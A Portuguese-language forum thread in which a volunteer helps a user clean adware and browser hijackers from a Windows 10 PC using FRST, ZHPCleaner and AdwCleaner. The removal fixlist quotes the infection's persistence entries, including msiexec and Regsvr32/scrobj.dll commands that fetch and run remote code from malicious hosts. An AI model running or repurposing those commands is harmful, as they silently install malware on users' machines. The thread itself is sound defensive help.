Logo Hardware.com.br
Uirã Alexandre
Uirã Alexand... Novo Membro Registrado
20 Mensagens 6 Curtidas

ajuda para remoção de malware - win 10

#1 Por Uirã Alexand... 20/05/2017 - 10:27
há pouco tempo atualizei o pc de win 7 para 0 10, porém de cara percebi que algo estava estranho. não consigo abrir configurações (as teclas de atalho como abaixar brilho tbm n funcionam), não consigo criar ponto de restauração do sistema entre outros. porém por se tratar de um pc meio lerdo por si só eu não queria perder tempo pra ficar indo atras de ver o que era.
ultimamente meu principal problema tem sido o aparecimento de muitas propagandas, mesmo com o adblock ativo, a pagina inicial do navegador sempre muda sozinho, mesmo que eu vá em configurações e digite o URL que eu queira, o que eu escrevi continua lá porém na prática sempre abre outra aba, a mesma coisa acontece com a ferramenta de pesquisa. até atalhos na área de trabalho de marcas "famosas" tem aparecido, e n adianta excluir os atalhos que eles voltam em seguida, sobre a pasta de origem é a do próprio navegador e eu n consigo identificar nada de estranho lá.
isso tudo tem feito o pc que já era lerdo ficar ainda pior e quase n dá pra mexer. desde já obrigado pela atenção.


Anexo do post
joram
joram Highlander Registrado
5.4K Mensagens 2.5K Curtidas
#2 Por joram
20/05/2017 - 12:08
/_ Bom Dia! Uirã Alexandre _\
Imagem

Imagem
https://www.hardware.com.br/comunidade/v-t/1226830/

Siga as recomendações oficiais deste Tópico e poste: FRST.txt + Addition.txt
Disponibilize os relatórios em Cjoint.com ou utilize spoiler,cuja instrução está ao final daquela página.
Outra opçãohospedar os relatórios em Hébergement de fichiers, Security-x.fr.

[Abs]
joram
joram Highlander Registrado
5.4K Mensagens 2.5K Curtidas
#4 Por joram
20/05/2017 - 23:58
/_ Boa Noite! Uirã Alexandre _\

> Desinstale: AlphaGo <<

> Copie estas informações que estão no spoiler,para o Bloco de Notas.
> Salve-as com o nome fixlist. << Texto ou Unicode!
> Salve-as no desktop! ( Área de trabalho ... )

"fixlist"
start
CloseProcesses:
HKU\S-1-5-21-3078266595-1327449511-1097889016-1000\...\Run: [background_fault] => C:\Users\User\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) <===== ATENÇÃO
HKU\S-1-5-21-3078266595-1327449511-1097889016-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1LFkRSFkIyRWMdMYUcMdhYRYMcFdI2OYRXFTlQFTJQRH== /q
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> Nenhum Arquivo
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> Nenhum Arquivo
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> Nenhum Arquivo
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restrição <======= ATENÇÃO
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494849662&z=a5e7bb4b2110e33f8ea3303g6zet8zbb0z2tfmeo1g&from=che0812&uid=TOSHIBAXMQ01ABD032_Z2P1SFX4SXXZ2P1SFX4S
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492605652&z=1c1bd2b5cbe5292930b8ee6g9zcteo5q6e8w5q2q9b&from=che0812&uid=TOSHIBAXMQ01ABD032_Z2P1SFX4SXXZ2P1SFX4S&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494849662&z=a5e7bb4b2110e33f8ea3303g6zet8zbb0z2tfmeo1g&from=che0812&uid=TOSHIBAXMQ01ABD032_Z2P1SFX4SXXZ2P1SFX4S
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492605652&z=1c1bd2b5cbe5292930b8ee6g9zcteo5q6e8w5q2q9b&from=che0812&uid=TOSHIBAXMQ01ABD032_Z2P1SFX4SXXZ2P1SFX4S&q={searchTerms}
HKU\S-1-5-21-3078266595-1327449511-1097889016-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://login.latinamweb.com/
HKU\S-1-5-21-3078266595-1327449511-1097889016-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://login.latinamweb.com/
HKU\S-1-5-21-3078266595-1327449511-1097889016-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494849662&z=a5e7bb4b2110e33f8ea3303g6zet8zbb0z2tfmeo1g&from=che0812&uid=TOSHIBAXMQ01ABD032_Z2P1SFX4SXXZ2P1SFX4S
HKU\S-1-5-21-3078266595-1327449511-1097889016-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494849662&z=a5e7bb4b2110e33f8ea3303g6zet8zbb0z2tfmeo1g&from=che0812&uid=TOSHIBAXMQ01ABD032_Z2P1SFX4SXXZ2P1SFX4S&q={searchTerms}
HKU\S-1-5-21-3078266595-1327449511-1097889016-1000\...\ChromeHTML: -> C:\Program Files\Bookness\Application\chrome.exe (Google Inc.) <==== ATENÇÃO
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492605652&z=1c1bd2b5cbe5292930b8ee6g9zcteo5q6e8w5q2q9b&from=che0812&uid=TOSHIBAXMQ01ABD032_Z2P1SFX4SXXZ2P1SFX4S&q={searchTerms}
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1492605652&z=1c1bd2b5cbe5292930b8ee6g9zcteo5q6e8w5q2q9b&from=che0812&uid=TOSHIBAXMQ01ABD032_Z2P1SFX4SXXZ2P1SFX4S&q={searchTerms}
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.ourluckysites.com/?type=sc&ts=1492605652&z=1c1bd2b5cbe5292930b8ee6g9zcteo5q6e8w5q2q9b&from=che0812&uid=TOSHIBAXMQ01ABD032_Z2P1SFX4SXXZ2P1SFX4S
Edge HomeButtonPage: HKU\S-1-5-21-3078266595-1327449511-1097889016-1000 -> hxxp://www.ourluckysites.com/?type=hp&ts=1492605652&z=1c1bd2b5cbe5292930b8ee6g9zcteo5q6e8w5q2q9b&from=che0812&uid=TOSHIBAXMQ01ABD032_Z2P1SFX4SXXZ2P1SFX4S
FF Homepage: Mozilla\Firefox\Profiles\y00re22y.default-1453250615773 -> hxxp://www.ourluckysites.com/?type=hp&ts=1492605652&z=1c1bd2b5cbe5292930b8ee6g9zcteo5q6e8w5q2q9b&from=che0812&uid=TOSHIBAXMQ01ABD032_Z2P1SFX4SXXZ2P1SFX4S
FF Keyword.URL: Mozilla\Firefox\Profiles\y00re22y.default-1453250615773 -> hxxp://login.latinamweb.com/search.php?q=
FF SearchPlugin: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\y00re22y.default-1453250615773\searchplugins\ourluckysites.xml [2017-05-15]
FF ProfilePath: C:\Users\User\AppData\Roaming\Firefox\Firefox\Profiles\y00re22y.default-1453250615773 [2017-05-19]
FF user.js: detected! => C:\Users\User\AppData\Roaming\Firefox\Firefox\Profiles\y00re22y.default-1453250615773\user.js [2017-04-17]
FF Homepage: Firefox\Firefox\Profiles\y00re22y.default-1453250615773 -> hxxp://login.gulfeconnection.com/search.php?q=
FF Keyword.URL: Firefox\Firefox\Profiles\y00re22y.default-1453250615773 -> hxxp://login.gulfeconnection.com/search.php?q=
FF Extension: (SimilarWeb) - C:\Users\User\AppData\Roaming\Firefox\Firefox\Profiles\y00re22y.default-1453250615773\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2017-04-17] [não assinado]
FF Extension: (HSearch) - C:\Users\User\AppData\Roaming\Firefox\Firefox\Profiles\y00re22y.default-1453250615773\Extensions\@E97YHOMI-FU8L-IM23-VUT9-RVDZT7M8XL8H.xpi [2017-04-17] [não assinado]
FF Extension: (FF Adr) - C:\Users\User\AppData\Roaming\Firefox\Firefox\Profiles\y00re22y.default-1453250615773\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-04-17] [não assinado]
FF Extension: (Português (pt-BR) Language Pack) - C:\Users\User\AppData\Roaming\Firefox\Firefox\Profiles\y00re22y.default-1453250615773\Extensions\[email]langpack-pt-BR@firefox.mozilla.org.xpi[/email] [2017-05-08] [não assinado]
FF Extension: (Video Speed Controller) - C:\Users\User\AppData\Roaming\Firefox\Firefox\Profiles\y00re22y.default-1453250615773\Extensions\{7be2ba16-0f1e-4d93-9ebc-5164397477a9}.xpi [2017-05-15]
StartMenuInternet: FIREFOX.EXE - C:\Program Files\Mozilla Firefox\firefox.exe hxxp://www.ourluckysites.com/?type=sc&ts=1494849662&z=a5e7bb4b2110e33f8ea3303g6zet8zbb0z2tfmeo1g&from=che0812&uid=TOSHIBAXMQ01ABD032_Z2P1SFX4SXXZ2P1SFX4S
CHR HomePage: Default -> hxxp://www.ourluckysites.com/?type=hp&ts=1492605652&z=1c1bd2b5cbe5292930b8ee6g9zcteo5q6e8w5q2q9b&from=che0812&uid=TOSHIBAXMQ01ABD032_Z2P1SFX4SXXZ2P1SFX4S
CHR StartupUrls: Default -> "hxxp://www.ourluckysites.com/?type=hp&ts=1492605652&z=1c1bd2b5cbe5292930b8ee6g9zcteo5q6e8w5q2q9b&from=che0812&uid=TOSHIBAXMQ01ABD032_Z2P1SFX4SXXZ2P1SFX4S"
CHR DefaultSearchURL: Default -> hxxp://www.ourluckysites.com/search/?type=ds&ts=1492605652&z=1c1bd2b5cbe5292930b8ee6g9zcteo5q6e8w5q2q9b&from=che0812&uid=TOSHIBAXMQ01ABD032_Z2P1SFX4SXXZ2P1SFX4S&q={searchTerms}
CHR DefaultSearchKeyword: Default -> ourluckysites
StartMenuInternet: Google Chrome - C:\Program Files\Google\Chrome\Application\chrome.exe hxxp://www.ourluckysites.com/?type=sc&ts=1494849662&z=a5e7bb4b2110e33f8ea3303g6zet8zbb0z2tfmeo1g&from=che0812&uid=TOSHIBAXMQ01ABD032_Z2P1SFX4SXXZ2P1SFX4S
HKU\.DEFAULT\...\StartMenuInternet\ChromeHTML: -> C:\Program Files\Bookness\Application\chrome.exe (Google Inc.) <==== ATENÇÃO
HKU\S-1-5-21-3078266595-1327449511-1097889016-1000\...\StartMenuInternet\ChromeHTML: -> C:\Program Files\Bookness\Application\chrome.exe (Google Inc.) <==== ATENÇÃO
HKU\S-1-5-18\...\StartMenuInternet\ChromeHTML: -> C:\Program Files\Bookness\Application\chrome.exe (Google Inc.) <==== ATENÇÃO
R2 ANSARE; C:\Users\User\AppData\Local\ANSARE\Snare.dll [671232 2017-05-08] (InterSect Alliance Pty Ltd) [Arquivo não assinado] <==== ATENÇÃO
R2 BIT; C:\ProgramData\BIT\BIT.dll [1857536 2017-05-17] (BIT) [Arquivo não assinado] <==== ATENÇÃO
S2 CWASRE; C:\Users\User\AppData\Local\CWASRE\Snare.dll [652288 2017-05-16] (InterSect Alliance Pty Ltd) [Arquivo não assinado] <==== ATENÇÃO
R2 FirefoxU; C:\Program Files\Firefox\bin\FirefoxUpdate.exe [106136 2017-05-07] () <==== ATENÇÃO
R2 Kitty; C:\Users\User\AppData\Local\Kitty\Kitty.dll [123904 2017-05-02] (word) [Arquivo não assinado] <==== ATENÇÃO
S2 NPASRE; C:\Users\User\AppData\Local\NPASRE\Snare.dll [652288 2017-05-10] (InterSect Alliance Pty Ltd) [Arquivo não assinado] <==== ATENÇÃO
R2 SNARE; C:\Users\User\AppData\Local\SNARE\Snare.dll [687616 2017-05-02] (InterSect Alliance Pty Ltd) [Arquivo não assinado] <==== ATENÇÃO
R2 SNAREA; C:\Users\User\AppData\Local\SNAREA\Snare.dll [671232 2017-05-03] (InterSect Alliance Pty Ltd) [Arquivo não assinado] <==== ATENÇÃO
R2 VNASRE; C:\Users\User\AppData\Local\VNASRE\Snare.dll [671232 2017-05-09] (InterSect Alliance Pty Ltd) [Arquivo não assinado] <==== ATENÇÃO
R2 WANARE; C:\Users\User\AppData\Local\WANARE\Snare.dll [671232 2017-05-05] (InterSect Alliance Pty Ltd) [Arquivo não assinado] <==== ATENÇÃO
R2 WinSAPSvc; C:\Users\User\AppData\Roaming\WinSAPSvc\WinSAP.dll [1873920 2017-05-17] (TODO: <公司名>) [Arquivo não assinado] <==== ATENÇÃO
S3 dbx; system32\DRIVERS\dbx.sys [X]
U3 idsvc; não ImagePath
U3 wpcsvc; não ImagePath
2016-08-31 14:07 - 2016-08-31 14:07 - 0000057 _____ () C:\ProgramData\Ament.ini
2017-05-16 11:57 - 2017-05-16 11:57 - 0003475 _____ () C:\ProgramData\_MC000001.bak
2017-05-16 11:57 - 2017-05-16 11:57 - 00003475 _____ C:\Users\Todos os Usuários\_MC000001.bak
2017-05-16 11:57 - 2017-05-16 11:57 - 00003475 _____ C:\ProgramData\_MC000001.bak
2017-05-15 08:56 - 2017-05-16 11:55 - 00000000 ____D C:\Users\User\AppData\Local\CWASRE
2017-05-11 10:49 - 2017-05-17 22:51 - 00000000 _____ C:\WINDOWS\system32\00
2017-05-11 10:49 - 2017-05-11 10:49 - 00000000 ____D C:\Users\User\AppData\Local\NPASRE
2017-05-10 09:00 - 2017-05-10 09:00 - 00000000 _____ C:\WINDOWS\system32\1
2017-05-09 08:33 - 2017-05-17 22:52 - 00000000 _____ C:\WINDOWS\system32\1111
2017-05-09 08:33 - 2017-05-17 10:13 - 00000000 _____ C:\WINDOWS\system32\3333
2017-05-09 08:33 - 2017-05-17 10:13 - 00000000 _____ C:\WINDOWS\system32\2222
2017-05-09 08:10 - 2017-05-09 08:10 - 00000000 ____D C:\Users\User\AppData\Local\VNASRE
2017-05-08 09:34 - 2017-05-08 09:34 - 00000000 ____D C:\Program Files\Firefox
2017-05-08 09:29 - 2017-05-08 09:29 - 00000000 ____D C:\Users\User\AppData\Local\ANSARE
2017-05-03 14:05 - 2017-05-03 14:05 - 00000000 ____D C:\Users\User\AppData\Local\SNAREA
2017-04-27 10:13 - 2017-05-04 08:49 - 00000000 ____D C:\WINDOWS\psgo
2017-04-23 22:01 - 2017-04-23 22:01 - 03029593 _____ C:\Users\User\Downloads\Baixaki_fceux.zip
2017-04-23 21:59 - 2017-04-23 22:00 - 01821672 _____ (Internet ) C:\Users\User\Downloads\Baixaki_fceux.exe
2017-04-20 12:15 - 2017-05-17 22:52 - 00000000 _____ C:\WINDOWS\system32\22
2017-04-20 12:15 - 2017-05-17 22:51 - 00000000 _____ C:\WINDOWS\system32\11
2017-04-19 09:41 - 2017-04-19 09:41 - 00000000 ____D C:\Program Files\temp
2017-04-19 09:39 - 2017-04-19 09:39 - 00000000 ____D C:\Users\User\AppData\Local\3DM
2017-04-17 13:53 - 2017-05-19 10:27 - 00000000 ____D C:\Users\User\AppData\LocalLow\Mozilla
2017-04-17 13:53 - 2017-04-17 13:53 - 00000000 ____D C:\Users\User\AppData\Local\Eastness
2017-04-17 13:52 - 2017-04-17 13:52 - 00000000 ____D C:\Users\User\AppData\Roaming\Firefox
2017-04-17 13:52 - 2017-04-17 13:52 - 00000000 ____D C:\Users\User\AppData\Local\Firefox
2017-04-17 13:51 - 2017-04-17 13:51 - 00000000 ____D C:\Users\Todos os Usuários\Software
2017-04-17 13:51 - 2017-04-17 13:51 - 00000000 ____D C:\ProgramData\Software
2017-04-17 13:51 - 2017-04-17 13:51 - 00000000 ____D C:\Program Files\Eastness
2017-04-17 13:50 - 2017-05-20 18:33 - 00000000 _____ C:\Users\Public\Documents\report.dat
2017-04-17 13:50 - 2017-05-20 09:06 - 00000000 _____ C:\Users\Public\Documents\temp.dat
2017-04-17 13:50 - 2017-04-21 11:01 - 00000000 ____D C:\Users\User\AppData\Local\Kitty
2017-04-17 13:49 - 2017-05-17 10:16 - 00000000 ____D C:\Users\User\AppData\Roaming\WinSAPSvc
2017-04-17 13:49 - 2017-05-15 08:55 - 00029160 _____ (Sysinternals - www.sysinternals.com) C:\WINDOWS\system32\Drivers\PROCEXP152.SYS
2017-04-17 13:49 - 2017-05-02 13:45 - 00000000 ____D C:\Users\User\AppData\Local\SNARE
2017-04-17 13:49 - 2017-04-17 13:50 - 00000000 ____D C:\Program Files\MIO
2017-04-17 13:44 - 2017-05-17 22:49 - 00000000 ____D C:\Program Files\BiaoJi
2017-04-11 21:52 - 2017-04-11 21:54 - 05659546 ____R (Swearware) C:\Users\User\Downloads\ComboFix.exe
2017-04-11 14:48 - 2017-04-11 14:48 - 01663672 _____ (Malwarebytes) C:\Users\User\Downloads\JRT.exe
2017-04-11 14:47 - 2017-04-11 14:48 - 04089296 _____ C:\Users\User\Downloads\adwcleaner_6.045.exe
2017-04-11 14:06 - 2017-05-20 10:19 - 00000000 ____D C:\Users\User\Desktop\projeto antvirus
2017-04-10 21:03 - 2017-04-10 21:03 - 00000000 ____D C:\Users\User\AppData\Local\ESET
2017-04-10 20:53 - 2017-04-10 21:02 - 06752896 _____ (ESET spol. s r.o.) C:\Users\User\Downloads\esetonlinescanner_enu.exe
2017-04-03 16:32 - 2016-05-13 15:52 - 00000000 ____D C:\Users\User\Downloads\mbam-chameleon-3.1.33.0
2017-04-03 16:32 - 2016-03-10 14:08 - 00126336 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2017-04-03 16:31 - 2017-04-03 16:31 - 06705178 _____ C:\Users\User\Downloads\mbam-chameleon-3.1.33.0.zip
2017-04-03 15:58 - 2017-04-03 15:58 - 01107968 _____ C:\Users\User\Downloads\RSIT.exe
2017-04-03 12:44 - 2017-04-05 22:09 - 05659546 ____R (Swearware) C:\Users\User\Downloads\lol.exe
2017-03-27 11:45 - 2017-03-27 11:46 - 40002616 _____ (Hewlett-Packard Company ) C:\Users\User\Downloads\sp71525.exe
2017-03-27 11:34 - 2017-04-12 03:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScreenShot
2017-03-27 11:34 - 2017-03-27 11:34 - 00000000 ____D C:\Program Files\ScreenShot
2017-03-27 11:33 - 2017-04-11 10:32 - 00000000 ____D C:\Users\User\AppData\Roaming\ScreenShot
2017-04-26 12:51 - 2017-04-26 13:07 - 398862064 _____ (AMD Inc.) C:\Users\User\AppData\Local\Temp\tmp4A88.exe
2017-05-12 08:03 - 2017-05-12 08:17 - 398919576 _____ (AMD Inc.) C:\Users\User\AppData\Local\Temp\tmp60AE.exe
Task: {40D4CF47-3ECA-4FC1-AE4D-A9F02E61762D} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj1LFkRSFkIyRWMdMYUcMdhYRYMcFdI2OYRXFTlQFTJQRH== scrobj.dll
Task: {807D758C-EDBE-4BFD-9ED3-B39C145484D7} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1
Task: {8C2E4A0B-2B7B-4DC5-B437-B1834BCFA3AD} - System32\Tasks\Milimili => C:\Program Files\MIO\MIO.exe [2017-05-17] () <==== ATENÇÃO
Shortcut: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome\Inicializador de aplicativos do Google Chrome.lnk -> C:\Program Files\Eastness\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files\Eastness\Application\chrome.exe (Google Inc.)
ShortcutWithArgument: C:\Users\User\Music\Bandas\1- Discografias\SOAD\1998 - System Of A Down\Rock n Roll.lnk -> C:\Arquivos de programas\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://radiolavirtualmusic.blogspot.com/
ShortcutWithArgument: C:\Users\User\AppData\Local\Google\Chrome\User Data\Inicializador de aplicativos do Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google Inc.) -> --show-app-list
ShortcutWithArgument: C:\Users\User\AppData\Local\Eastness\User Data\Inicializador de aplicativos do Google Chrome.lnk -> C:\Program Files\Google\Chrome\Application\chrome.exe (Google Inc.) -> --show-app-list
ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492605652&z=1c1bd2b5cbe5292930b8ee6g9zcteo5q6e8w5q2q9b&from=che0812&uid=TOSHIBAXMQ01ABD032_Z2P1SFX4SXXZ2P1SFX4S
ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492605652&z=1c1bd2b5cbe5292930b8ee6g9zcteo5q6e8w5q2q9b&from=che0812&uid=TOSHIBAXMQ01ABD032_Z2P1SFX4SXXZ2P1SFX4S
FirewallRules: [{5575930C-1D15-4D4D-96F9-210FE7703C04}] => (Allow) C:\Program Files\IObit\Advanced SystemCare\Surfing Protection\FFNativeMessage.exe
FirewallRules: [{3D78DE93-6965-48EE-87A2-72239182ADC2}] => (Allow) C:\Program Files\IObit\Advanced SystemCare\Surfing Protection\FFNativeMessage.exe
FirewallRules: [{4F2B1E52-80AE-42C8-B4E1-0EA0A91A178A}] => (Allow) C:\Program Files\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{FB2C8350-0B5C-4359-9A4C-AAD8186D2A37}] => (Allow) C:\Program Files\Firefox\Firefox.exe
FirewallRules: [{06E57362-8FD1-4DF2-B481-9E6DD09DE3F8}] => (Allow) C:\Program Files\Bookness\Application\chrome.exe
FirewallRules: [{319BBF47-2457-4105-BC93-4310D7FCAC1B}] => (Allow) C:\Program Files\MIO\loader\toshibaxmq01abd032_z2p1sfx4sxxz2p1sfx4s.dat
FirewallRules: [{CDDB527C-0A56-4C70-BC92-A1B1EC36D4D9}] => (Allow) C:\Program Files\MIO\loader\toshibaxmq01abd032_z2p1sfx4sxxz2p1sfx4s.dat
C:\Users\User\AppData\Local\background_fault\QQIme.exe
C:\Users\User\AppData\Local\background_fault\aswRD.exe
C:\Program Files\Firefox\bin\FirefoxUpdate.exe
CreateRestorePoint:
RemoveProxy:
EmptyTemp:
Reboot:
Hosts:
end


> Execute FRST/FRST64 >> Clique "Corrigir" << Aguarde!
> Poste o relatório "Resultado da Correção pela Farbar Recovery Scan Tool". (Fixlog.txt)
> Este e outros relatórios,podem ser encontrados na pasta: Disco Local (C) > FRST > Logs

Imagem
< Peço aos visitantes que não utilizem este script em outros computadores,sob risco de danos aos mesmos! >

A+
joram
joram Highlander Registrado
5.4K Mensagens 2.5K Curtidas
#6 Por joram
23/05/2017 - 22:01
/_ Boa Noite! Uirã Alexandre _\

> Baixe: < Imagem > ( Imagem ... de Nicolas Coolman )

> Ou |Aqui!| << Mirror!

> Estando na página,clique Imagem

> Salve-a no desktop! ( ZHPCleaner.exe )
> Desabilite seu antivírus e execute ZHPCleaner.exe <<

Imagem

> Clique "Eu".

Imagem

> Clique Scanner.

Imagem

> Aguarde a conclusão!

Imagem

> Ao concluir,clique Reparar.

Imagem

> Surgirão guias que estarão em vermelho,indicando problemas a serem reparados.
> Clique Reparar.

Imagem

> Ao concluir,clique Relatório!
> Poste o log de reparo: ~ Type : Reparo

[Abs]
joram
joram Highlander Registrado
5.4K Mensagens 2.5K Curtidas
#8 Por joram
24/05/2017 - 01:27
/_ Bom Dia! Uirã Alexandre _\

> Baixe: < FSS > ( ... by Farbar )
> Salve-a ao desktop!

Imagem

> Para Windows Vista,7 ou 8,execute "FSS.exe" como administrador.

<1> Internet Services
<2> Windows Firewall
<3> System Restore
<4> Security Center/Action Center
<5> Windows Update
<6> Windows Defender

Imagem

> Marque as seguintes caixas!
> Clique em "Scan" e aguarde o seu término!
> Poste o relatório! ( FSS.txt )

[A+]
joram
joram Highlander Registrado
5.4K Mensagens 2.5K Curtidas
#10 Por joram
24/05/2017 - 23:21
/_ Boa Noite! Uirã Alexandre _\

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\
StandardProfile]
"EnableFirewall"=DWORD:1
---
> Acesse o Registro e altere o valor DWORD:0 para DWORD:1
> Execute,novamente,a FRST.exe e poste: FRST.txt + Addition.txt

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\
StandardProfile]
"EnableFirewall"=DWORD:00000001


> Copie estas informações,em destaque,para o Bloco de Notas.
> Salve este Bloco de Notas ao desktop,com o nome:
PF.reg
> Mas antes de o salvar,coloque o Bloco para Arquivos do Tipo: "Todos os arquivos"
> Será criado um arquivo de Informações ao Registro do Windows.
> Vá ao desktop e o abra,escolhendo o Editor do registro.
> Basta dar clique direito nesse arquivo e escolher: "Abrir com" >> "Editor do registro"

> Confirme e reinicie o computador!

Edit: Incluir instrução para incluir informações ao Registro do Windows

[Abs]
joram
joram Highlander Registrado
5.4K Mensagens 2.5K Curtidas
#12 Por joram
06/06/2017 - 13:04
/_ Boa Tarde! Uirã Alexandre _\

Ok! Resta-lhe a construção do arquivo de informações ao registro e executá-lo. (PF.reg)

Houve um lapso de tempo considerável,até o seu retorno! de_olho.gif
Como está a situação da máquina?
--
--
> Baixe: < Imagem > ( ... par Xplode )

> Ou daqui: < AdwCleaner > << Link!
> Ao acessar,clique em "Download Now".

> Salve-o no desktop!
> Desabilite seu antivírus!

< Imagem >

> Clique direito em adwcleaner.exe,e escolha sua execução como administrador.

Imagem

> Clique "Ferramentas" >> "Opções".

Imagem

> Estando em "Opções",deixe as configurações conforme este banner.
> Clique "Ok".

Imagem

> Ps: Dê início ao scan,clicando em "Verificar".

Imagem

> Ao concluir,clique "Limpar" ou "Cleaning" >> Ok >> Ok >> Ok.
> Copie o log ou clique "Relatorio".
> Poste: < C:\AdwCleaner\AdwCleaner[C0].txt >

[Abs]
Uirã Alexandre
Uirã Alexand... Novo Membro Registrado
20 Mensagens 6 Curtidas
#13 Por Uirã Alexand...
08/06/2017 - 11:58
desculpe pelo lapso de tempo entre pra resposta, só estava usando o pc pra estudar, entrei de férias e dei uma largada dele, pra n passar raiva...
em pouco tempo ela voltou a apresentar os atalhos, porém os outros problemas com propagandas estão mais leves, ainda não consigo instalar nem executar alguns aplicativos ( pra usar o adclean por exemplo tive que mudar o nome), não consigo tbm acessar configurações do sistema.

segue o link do relatório de limpeza: http://www.cjoint.com/c/GFio3Vu6J7i
Uirã Alexandre
Uirã Alexand... Novo Membro Registrado
20 Mensagens 6 Curtidas
#15 Por Uirã Alexand...
08/06/2017 - 22:54
seguem os logs requeridos:

frst.txt = http://www.cjoint.com/c/GFjbW3t2gei
addition.txt = http://www.cjoint.com/c/GFjbX5xtuoi
log de reparo zhp = http://www.cjoint.com/c/GFjbYY4Qvfi

(após reparar com o adclean o youtube tem exibido apenas a janela do video, todo o resto do site fica em branco, porém abrindo na janela anônima tá normal... )
© 1999-2024 Hardware.com.br. Todos os direitos reservados.
Imagem do Modal